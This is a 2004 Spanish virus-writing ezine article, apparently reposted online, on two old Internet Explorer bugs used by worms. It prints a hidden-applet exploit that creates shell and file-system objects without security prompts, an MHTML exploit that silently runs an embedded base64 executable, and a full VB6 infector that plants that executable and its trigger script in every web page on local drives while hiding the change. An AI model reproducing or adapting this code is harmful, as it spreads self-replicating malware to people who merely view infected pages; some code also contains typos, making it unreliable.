Gedzac Mitosis Ezine Issue 02 006

eZine lover (@eZine)

Published in 

Mitosis

 · 11 Oct 2020

  

(C) MITOSIS #2 E-Zine/GEDZAC 2004 

                                               
Tema          : IE 5.X y IE 6.X Bugs 
Autor         : MachineDramon 
Válido para   : Microsoft Visual Basic 6.0 y VBScript 

En este Articulo se  trataran  2 bugs de IE, el primero bastante conocido y solo 
funcional en IE 5.X, el segundo algo mas nuevo y funcional en IE 5.X y 6.X 

1)Este bug es el usado por los worms VBS/Redlof y VBS/KarmaHotel para poder  
ejecutarse, con solo ver una pagina web, y consiste en llamar a los objetos 
"WScript.Shell" y "Scripting.FileSystemObject" sin que IE de alertas de 
seguridad. 

Codigo del bug: 

<html> 

 'Esto es para evitar que el usuario note algo sospechoso en la page y 
 'para hacer posible el bug llamando al Applet de Java que es vulnerable 
<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'> 
<APPLET NAME=GEDZAC HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div> 

<script language='vbscript'> 

 'Este es el codigo en VBScript para llamar al Applet que hemos creado 
 'en este caso llamado GEDZAC 
Set AppleObject = document.applets("GEDZAC") 

 'Con esto creamos el objeto "WScript.Shell" 
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") 
AppleObject.createInstance() 
Set WS = AppleObject.GetObject() 

 'Con esto creamos el objeto "Scripting.FileSystemObject" 
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}") 
AppleObject.createInstance() 
Set FSO = AppleObject.GetObject() 

 'Ahora podemos usarlos como si fuera un .vbs por ejemplo aqui mostrara 
 'un cuadro de mensage con el directorio de windows. 
WS.Popup FSO.GetSpecialFolder(0) 

</script> 
</html> 

 
2)Este bug es más reciente reportado por www.securityfocus.com ,informacion en  
español en http://www.vsantivirus.com/vul-mhtml-file.htm 
Con el es posible activar archivos ejecutables, incluidos en una pagina web 
sin que IE de ninguna advertencia. (me parece que solo en forma local 
con el IE 6) 

--------------------------------------------------------------------------- 
A continuacion se coloca el bug original: 

MIME-Version: 1.0 
Content-Location:file:///malware.exe 
Content-Transfer-Encoding: base64 

TVpEAQUAAgAgACEA//91AAACAACZAAAAPgAAAAEA+zBqcgAAAAAAAAAAAAAAAAAAAAAAAA 

......como 2 hojas de code 64..... 

PzU/PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8= 

<!-- 25.02.03 - http://www.malware.com --> 
<title>malware.com</title> 
<body bgcolor=black scroll=no> 
<SCRIPT> 
//25.02.03 - http://www.malware.com 
function malware() 
{ 
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); 
path=unescape(path); 
document.write( ' <title>malware.com</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">malware.com </center><object style="cursor:cross-hair" alt="moo ha ha" classid="clsid:66666666-6666-6666-6666"  CODEBASE="mhtml:'+path+'\\malware.html!file:///malware.exe"></object>') 
} 
setTimeout("malware()",150) 
</script> 

-----------------------------------------------------------------------------  
Este es un codigo en VB 6.0 para aprovechar este bug en la infeccion de  
paginas web. 

La idea es que el codigo busque en el disco archivos con extencion htm, 
html o plg y verifique la infeccion, si no los infectara. 

Si solamente agregamos el codigo en base64 y el bug, el virus funcionara 
pero el usuario no podra ver la pagina normalmente. 

Para eso el virus debera guardar dentro de la misma pagina el  
codigo encriptado, de la misma y codigo en VBScript para desencriptar 
el codigo y mostrar la page de forma normal y ejecutar el virus. 

 

'En la Declaraciones generales del Formulario, declaramos variables 

Dim Cf, Cw, Cd, CodeCapsideB64, CodeScript1, CodeScript2 

Private Sub Form_Load() 

'Declaramos Resumidor de Errores y el FSO y WS 

On Error Resume Next 
Set Cf = CreateObject("Scripting.FileSystemObject") 
Set Cw = CreateObject("WScript.Shell") 

'Almacenamos en CodeCapsideB64 el codigo en base64 del virus, en este caso 
'ubicado el virus en el directorio de windows en un archivo Virus.exe 

CodeCapsideB64 = B64(Cf.GetSpecialFolder(0) & "\Virus.exe") 

'Almacenamos en CodeScript1 parte del codigo que insertaremos en la pagina 
'web infectada, y le agregamos el codigo en base64 

CodeScript1 = "MIME-Version: 1.0" & vbCrLf & _ 
"Content-Location:file:///Capside.exe" & vbCrLf & _ 
"Content-Transfer-Encoding: base64" & vbCrLf & _ 
CodeCapsideB64 & vbCrLf & _ 
"<Script Language = 'VBScript'>" & vbCrLf 

'Almacenamos en CodeScript2 la otra parte del codigo que insertaremos  
'en la pagina web infectada 

CodeScript2 = vbCrLf & "id = setTimeout(" & Chr(34) & "IEB()" & Chr(34) & ", 150)" & vbCrLf & _ 
"Sub IEB()" & vbCrLf & _ 
"Vpt = LCase(Document.url)" & vbCrLf & _ 
"Vtx=" & Chr(34) & "<object style=$cursor:cross-hair$ classid=$clsid:22222222-2222-2222-2222$  CODEBASE=$mhtml:" & Chr(34) & "&Vpt&" & Chr(34) & "!file:///Capside.exe$></object>" & Chr(34) & vbCrLf & _ 
"Vtx = Replace(Vtx, " & Chr(34) & "$" & Chr(34) & ", Chr(34)): Document.Write (Vtx) & vbCrLf & Capside" & vbCrLf & _ 
"End Sub" & vbCrLf & _ 
"Function Ec(code)" & vbCrLf & _ 
"For i = 1 To Len(code)" & vbCrLf & _ 
"Ck = Asc(Mid(code, i, 1))" & vbCrLf & _ 
"If Ck = Asc(" & Chr(34) & "¥" & Chr(34) & ") Then" & vbCrLf & _ 
"Ec = Ec & " & Chr(34) & "%" & Chr(34) & vbCrLf & _ 
"ElseIf Ck = 28 Then" & vbCrLf & _ 
"Ec = Ec & Chr(13)" & vbCrLf & _ 
"ElseIf Ck = 29 Then" & vbCrLf & _ 
"Ec = Ec & Chr(10)" & vbCrLf & _ 
"Else" & vbCrLf & _ 
"Ec = Ec & Chr(Ck Xor 7)" & vbCrLf & _ 
"End If" & vbCrLf & _ 
"Next" & vbCrLf & _ 
"End Function" & vbCrLf & _ 
"</Script>" 

'Llamamos al procedimiento VDisk 
Call VDisck 

End Sub 

 'Este es codigo para listar los discos, subdirectorios y archivos 
 'y es practicamente igual al metodo usado por VBS/LoveLetter 

Sub VDisk() 
On Error Resume Next 
Set Vd = Cf.Drives 
For Each Vdt In Vd 
If (Vdt.DriveType = 2) Or (Vdt.DriveType = 3) Then 
VFolder Vdt.Path & "\" 
End If 
Next 
End Sub 

Sub VFolder(F) 
On Error Resume Next 
Set Cfl = Cf.GetFolder(F) 
Set Cfs = Cfl.Subfolders 
For Each Fl In Cfs 
VFiles Fl.Path 
VFolder Fl.Path 
Next 
End Sub 

Sub VFiles(F) 
On Error Resume Next 
Set fls = Cf.GetFolder(F) 
Set Fs = fls.Files 
For Each Fh In Fs 
Fx = LCase(Cf.GetExtensionName(Fh.Path)) 

 'Si la extencion del Archivo es htm o html o plg , le pasamos la ruta al 
 'procedimiento CodeH 
If If (Fx = "htm") or (Fx = "html") or (Fx = "plg") Then 
CodeH (Fh.Path) 
End If 

Next 
End Sub 

 'Este es el procedimiento de infeccion 

Sub CodeH(rp) 
On Error Resume Next 

 'Abrimos el archivo que le habremos pasado al Sub CodeH 
Set H1 = Cf.OpenTextFile(rp) 

 'Leemos una linea 
Hr1 = H1.ReadLine 

 'Si contiene la palabra "MIME" ya esta infectado y lo cerramos y  
 'salimos del Sub 
If InStr(Hr1, "MIME") <> 0 Then 
H1.Close 
Exit Sub 

 'Sino lo leemos totalmente y los cerramos 
Else 
Hr2 = H1.ReadAll: H1.Close 
End If 

 'Ahora encriptamos todo el contenido de la pagina web 
For i = 1 To Len(Hr2) 
Ck = Asc(Mid(Hr2, i, 1)) 
If Ck = Asc("%") Then 
Ec = Ec & "¥" 
ElseIf Ck = 13 Then 
Ec = Ec & Chr(28) 
ElseIf Ck = 10 Then 
Ec = Ec & Chr(29) 
Else 
Ec = Ec & Chr(Ck Xor 7) 
End If 
Next 

 'Le añadimos al codigo encriptado de la pagina 
 'parte del codigo en VBSCript 
Ec = "Capside = Ec(" & Chr(34) & Ec & Chr(34) & ")" 

 'Abrimos el archivo colocamos el codigo en VBScript que accionara el virus 
 'en codeb64 y el contenido de la pagina encriptado. 
Set H2 = Cf.OpenTextFile(rp, 2, 1) 
H2.Write CodeScript1 & Ec & CodeScript2 
H2.Close 

End Sub 

 
 'Esta es la funcion para obtener el code64 
 '(funcion sacada de un codigo de Alcopaul) 

Public Function B64(ByVal vsFullPathname) 
On Error Resume Next 
Dim b           As Integer: Dim Base64Tab  As Variant 
Dim bin(3)      As Byte: Dim s, sResult As String: Dim l, i, FileIn, n As Long 
         
Base64Tab = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/") 
     
Erase bin: l = 0: i = 0: FileIn = 0: b = 0: s = "": FileIn = FreeFile 
     
Open vsFullPathname For Binary As FileIn 
sResult = s & vbCrLf: s = "": l = LOF(FileIn) - (LOF(FileIn) Mod 3) 
For i = 1 To l Step 3 

Get FileIn, , bin(0): Get FileIn, , bin(1): Get FileIn, , bin(2) 
         
If Len(s) > 64 Then 
s = s & vbCrLf: sResult = sResult & s: s = "" 
End If 

b = (bin(n) \ 4) And &H3F: s = s & Base64Tab(b) 
b = ((bin(n) And &H3) * 16) Or ((bin(1) \ 16) And &HF) 
s = s & Base64Tab(b): b = ((bin(n + 1) And &HF) * 4) Or ((bin(2) \ 64) And &H3) 
s = s & Base64Tab(b): b = bin(n + 2) And &H3F: s = s & Base64Tab(b) 
Next i 

If Not (LOF(FileIn) Mod 3 = 0) Then 
For i = 1 To (LOF(FileIn) Mod 3) 
Get FileIn, , bin(i - 1) 
Next i 
If (LOF(FileIn) Mod 3) = 2 Then 
b = (bin(0) \ 4) And &H3F: s = s & Base64Tab(b) 
b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF) 
s = s & Base64Tab(b): b = ((bin(1) And &HF) * 4) Or ((bin(2) \ 64) And &H3) 
s = s & Base64Tab(b): s = s & "=" 
Else 
b = (bin(0) \ 4) And &H3F: s = s & Base64Tab(b) 
b = ((bin(0) And &H3) * 16) Or ((bin(1) \ 16) And &HF) 
s = s & Base64Tab(b): s = s & "==" 
End If 
End If 

If s <> "" Then 
s = s & vbCrLf: sResult = sResult & s 
End If 
s = "" 
Close FileIn: B64 = sResult 
End Function 
----------------------------------------------------------------------------- 

El codigo de una pagina infectada sera parecido a: 

 
 'Esto indica la  version del MIME, el nombre del archivo a ejecutar 
 'y que esta en base64 
MIME-Version: 1.0 
Content-Location:file:///Capside.exe 
Content-Transfer-Encoding: base64 

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
.....Code64...... 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAA== 

<Script Language = 'VBScript'> 

 'Almacenamos en Capside el codigo encriptado de la pagina web y llamamos 
 'a la funcion Ec para desencriptarlo y mostrar la pagina.  

Capside = Ec(";&**'tfqbc'auhj'ruk:/7723.ossw=((ppp)wbut~tsbjt)ibs(thtqnurt(qnurafjh(dhundf)osj'**9;OSJK9;OBFC9;SNSKB9Dhundf;(SNSKB9;JBSF'ossw*bvrnq:Dhisbis*S~wb'dhisbis:%sbs(osjk<'dofutbs:nth*??2>*6%9;JBSF'dhisbis:%JTOSJK'1)77)5177)7%'ifjb:@BIBUFSHU9;JBSF'dhisbis:%qnurt+'jfduhqnurt+'jfduh'qnurt+'`rtfiht+'suh~fi'ohutbt+'fisnqnurt+'wbu't~tsbjt+'wbut~tsbjt+'wbu'fisnqnurt+'wbu'fisnqnurt+'mhu`b'jfdofch%'ifjb:lb~phuct9;TDUNWS's~wb:sbs(mfqftdunws9jbttf`b':'%®'Mhu`b'Jfdofch%<aridsnhi'IhUn`osDkndl/e.'|'''na///ifqn`fshu)fwwIfjb::%Jnduhthas'Nisbuibs'Bwkhubu%.!!/bqbis)ersshi'9'6..'''{{//ifqn`fshu)fwwIfjb::%Ibstdfwb%.!!/e)pondo'9'6...|'''fkbus/jbttf`b.<'''ubsrui'afktb<'''zzchdrjbis)hijhrtbchpi':'IhUn`osDkndl<(('**9;(TDUNWS9;(OBFC9;EHC^'qKnil:$7777aa'knil:$7777aa'kbasJfu`ni:2'shwJfu`ni:79;SFEKB'dbkkTwfdni`:7'dbkkWfccni`:7'pncso:326'ehucbu:79'';SEHC^9'';SU9'''';SC'pncso:010'e`Dhkhu:$7777779'''''';CNQ'fkn`i:dbisbu9'''''';SFEKB'dbkkTwfdni`:6'dbkkWfccni`:3'pncso:010'ehucbu:79'''''''';SEHC^9'''''''';SU'e`Dhkhu:$713f>59'''''''''';SC'qFkn`i:ehsshj'ihPufw'fkn`i:jncckb'pncso:0319'''''''''''';W'fkn`i:kbas9;AHIS'afdb:Qbucfif'dhkhu:$aaaaaa'tn}b:59DHUNDF+'cb'''''''''''''wuhwf`fdnôi'jftnqf'qêf'dhuubh+'dfjenf'dhian`rufdnôi'cb'Nisbuibs'''''''''''''Bwkhubu'~'pfkkwfwbu)'!ietw<;(AHIS9;(W9;(SC9;(SU9'''''''';DBISBU9'''''''';SU'e`Dhkhu:$3>03fc9'''''''''';SC'pncso:0549'''''''''''';W'fkn`i:dbisbu9;AHIS'afdb:Qbucfif'dhkhu:$aaaaaa'tn}b:69/d.'Mhu`b'''''''''''''Jfdofch!ietw<'''''Knjf*Wbuý;(AHIS9;(W9;(SC9;(SU9;(SEHC^9;(SFEKB9;(DBISBU9;(CNQ9;(SC9;(SU9;(SEHC^9;(SFEKB9;W9;AHIS'afdb:Qbucfif'dhkhu:$?77777'tn}b:59;E9QET(DhundfGJJ;(E9;(AHIS9;(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$?777779;E9Dhundf;(E9;(AHIS9'bt'ri'`rtfih'ubwhusfch'bk'53'cb'Tbwsnbjeub'cbk'5775+'vrb'tb'wuhwf`f';F'ouba:%ossw=((ppp)wbut~tsbjt)ibs(thtqnurt(`bibufk(ubjfnkbu)osj%'sfu`bs:Xekfil9jftnqfjbisb;(F9'bi'jbitfmbt'cb'dhuubh+'dhi'ri'fudonqh';F'ouba:%ossw=((ppp)wbut~tsbjt)ibs(thtqnurt(`bibufk(fibfch)osj%'sfu`bs:Xekfil9fibfch;(F9'cb'fwbift'3)5'LE'dhi'bk'ihjeub'cb';E9;AHIS'dhkhu:$?777779Jnduhthas)qet;(AHIS9;(E9+'bi'rih'cb'cht'ahujfsht'tnjnkfubt'dhi'dhisbinch'bi'btwföhk'h'ni`kît);(AHIS9;(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777779Btsb';(AHIS9;AHIS'dhkhu:$?777779;E9QET;(E9;(AHIS9;AHIS'dhkhu:$7777779'niabdsf';AHIS'dhkhu:$7777?79;E9Pnichpt'>2(>?(IS(Jb(5777(_W;(E9;(AHIS9+'nidkr~bich'kht'tbuqnchubt';AHIS'dhkhu:$7777?79;E9IS(5777;(E9;(AHIS9);(AHIS9!ietw<;(AHIS9;(W9;W9;NJ@'obn`os:5?5'tud:%DhundfXfudonqht(dhundf6)`na%'pncso:4>7'ehucbu:79;(W9;W9;NJ@'obn`os:5?5'tud:%DhundfXfudonqht(dhundf5)`na%'pncso:4>7'ehucbu:79;AHIS'afdb:Qbucfif'tn}b:59!ietw<';(AHIS9;(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Fk'tbu'bmbdrsfch+'bk'`rtfih'tb'frshdhwnf'f';AHIS'dhkhu:$7777?79;E9D=[¥pnichpt¥[jnduhthas)qet;(E9;(AHIS9'~'wfuf'bmbdrsfutb'kf'wuônjf'qb}'vrb'tb'nindnb'bk'tntsbjf'f`ub`f'bk'tn`rnbisb'qfkhu'fk'ub`ntsuh=;EU9;EU9;E9;AHIS'dhkhu:$7777?79\OLb~XKhdfkXJfdonib[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[UriZ;(AHIS9;(E9;EU9;AHIS'dhkhu:$7777?79Cbafrks':'%D=[¥pnichpt¥[jnduhthas)qet%;(AHIS9;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$?777779;E9¥pnichpt¥;(E9;(AHIS9'bt'rif'qfunfekb'vrb'dhuubtwhicb'f';E9;AHIS'dhkhu:$7777?79D=[Pnichpt;(AHIS9;(E9'bi'Pnichpt'>(JB'~'f';AHIS'dhkhu:$7777?79;E9D=[Pniis;(E9;(AHIS9'bi'Pnichpt'IS[5777[_W)!ietw<;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Drfich'btsb'Qntrfk'Eftnd'Tdunws'bt'bmbdrsfch'dubf'ri'fudonqh'cb'ihjeub';AHIS'dhkhu:$?777779;E9JNDUHTHAS)KIL;(E9;(AHIS9'bk'drfk'bt'ri'qêidrkh'cnubdsh'fk';AHIS'dhkhu:$?777779;E9JNDUHTHAS)QET;(E9;(AHIS9+'rendfch'bi'kf'dfuwbsf'cb'Pnichpt+'bk'drfk'dubf'bk'fudonqh';AHIS'dhkhu:$?777779;E9JNDUHTHAS)S_S;(E9;(AHIS9+'dhi'bk'tn`rnbisb'dhisbinch=;EU9;E9)')')')')')'X')')')')')'X')')'X')')')')')')'X')'X')')')'X')')')'X')')')')')')')'X')')')')')'X')')'X')')')')')')'X')'X')')')'X')')')'X')!ietw<;(E9;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Sfjenîi'ubfkn}f'kft'tn`rnbisbt'fddnhibt=!ietw<;EU9;EU9Jhcnandfich'kf'tn`rnbisb'kkfqb+'fksbuf'kf'wæ`nif'cb'Nindnh'cbk'Nisbuibs'Bwkhubu'ofdnf'btsb'bikfdb=;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777?79;E9;F'ouba:%ossw=((ppp)kfsni`rnf)dhj(%9ossw=((ppp)kfsni`rnf)dhj(;(F9!ietw<!ietw<;(E9;(AHIS9;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777?79;E9\OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Nisbuibs'Bwkhubu[JfniZ;(E9;(AHIS9;EU9;AHIS'dhkhu:$7777?79Tsfus'Wf`b;E9':';(E9%ossw=((ppp)kfsni`rnf)dhj%;(AHIS9!ietw<;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Dhi'kh'drfk'wubsbicb'tfsrufu'btb'whusfk)'Ftnjntjh'dubf'kf'kkfqb'cb'ub`ntsuh=!ietw<;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777?79;E9\OLB^XDKFTTBTXUHHS[QETAnkb[Tobkk[Bcns[DhjjficZ;(E9;(AHIS9;EU9;AHIS'dhkhu:$7777?79Cbafrks':'¥Pnichpt¥[Ihsbwfc)bb'¥%Pnichpt¥%[Jnduhthas)ss!ietw<;(AHIS9;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Bk'dhisbinch'cb';E9Jnduhthas)ss;(E9'fisbt'cbsfkkfch+'tb'jhtsufuæ'bi'wfisfkkf'dfcf'qb}'vrb'tb'nisbisb'bcnsfu'ri'fudonqh'dhi'bsbitnôi';E9;AHIS'dhkhu:$?777779)qet;(AHIS9;(E9);(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Jhcnandf'kf'dhian`rufdnôi'cbk'wfwbk'sfwn}'cbk'btdunshunh'cb'Pnichpt'dhi'kf'tn`rnbisb'kkfqb'cb'ub`ntsuh=;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777?79;E9\OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Nisbuibs'Bwkhubu[Cbtlshw[@bibufkZ;(E9;(AHIS9;EU9;AHIS'dhkhu:$7777?79Pfkkwfwbu;E9':';(E9¥Pnichpt¥[Fwwkndfsnhi'Cfsf[Jnduhthas[Nisbuibs'Bwkhubu[Pfkkwfwu)oss;(AHIS9;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59Kf'auftb'%;E9Qnqf'Dhtsf'Undf;(E9%'tb'jhtsufuæ'bi'bk'pfkkwfwbu'/wfwbk'sfwn}.'cbk'btdunshunh'cb'Pnichpt)!ietw<;(AHIS9';(W9;W9;AHIS'afdb:Qbucfif'tn}b:59F'dfrtf'cb'tr'jbitfmb'bi'btwföhk+';AHIS'dhkhu:$?777779;E9Dhundf;(E9;(AHIS9'btsæ'tnbich'ubwhusfch'bi'qfunht'wfntbt'cb'ofekf'ontwfif);EU9;(AHIS9;AHIS'afdb:Qbucfif'tn}b:59;EU9;E9;AHIS'dhkhu:$?777779WBU'FISNQNURT;(AHIS9;(E9;(AHIS9;AHIS'afdb:Qbucfif'dhkhu:$?77777'tn}b:69©;(AHIS9;AHIS'afdb:Qbucfif'tn}b:59;AHIS'dhkhu:$7777?79';(AHIS9qbutnôi'0)1'~'0)0'fdsrfkn}fch'fk'53'cb'Tbwsnbjeub'cbk'5775+'cbsbdsf'~'bknjnif'bandnbisbjbisb'btsb'`rtfih);(AHIS9';(W9;OU'dhkhu:$7777?79;W9;F'ouba:%ossw=((ppp)wbut~tsbjt)ibs(thtqnurt(qnurafjh(nicb)osj%'sfu`bs:Xshw9;AHIS'afdb:Qbucfif'dhkhu:$?77777'tn}b:59;NJ@'obn`os:42'fks:%Nu'fk'jbiý'fisbunhu%'tud:%DhundfXfudonqht(fisbunhu)`na%'pncso:42'ehucbu:79;(AHIS9;(F9;(W9;W9;F'ouba:%ossw=((ppp)wbut~tsbjt)ibs(nicb)osj%'sfu`bs:Xshw9;NJ@'obn`os:2?'fks:%Ub`ubtfu'fk'Whusfk'cb'WBU'T^TSBJT%'tud:%DhundfXfudonqht(ohjb)`na%'pncso:?6'ehucbu:79;(F9;(W9;(EHC^9;(OSJK9") 

 'Luego de 150 milisegundos(o algo así) es llamado el Sub IEB 
id = setTimeout("IEB()", 150) 

Sub IEB() 

 'Obtiene la ruta o url de la pagina web y lo convierte en minusculas 
Vpt = LCase(Document.url) 

 'Este codigo es el que se encarga de hacer posible el bug y se indica el 
 'nombre de archivo a ejecutar(debe ser el mismo nombre que el colocado 
 'al empezar la pagina, en la parte del MIME) 
Vtx="<object style=$cursor:cross-hair$ classid=$clsid:22222222-2222-2222-2222$  CODEBASE=$mhtml:"&Vpt&"!file:///Capside.exe$></object>" 

 'Reemplaza en Vtx los $ por comillas (") 
Vtx = Replace(Vtx, "$", Chr(34)) 

 'Escribe en el documento a Vtx y al codigo desencriptado de la pagina 
 'web 
Document.Write (Vtx) & vbCrLf & Capside 

End Sub 

 'Esta es la funcion que desencripta el codigo de la pagina 
Function Ec(code) 
For i = 1 To Len(code) 
Ck = Asc(Mid(code, i, 1)) 
If Ck = Asc("¥") Then 
Ec = Ec & "%" 
ElseIf Ck = 28 Then 
Ec = Ec & Chr(13) 
ElseIf Ck = 29 Then 
Ec = Ec & Chr(10) 
Else 
Ec = Ec & Chr(Ck Xor 7) 
End If 
Next 
End Function 
</Script> 

 
(C) MITOSIS #2 E-Zine/GEDZAC 2004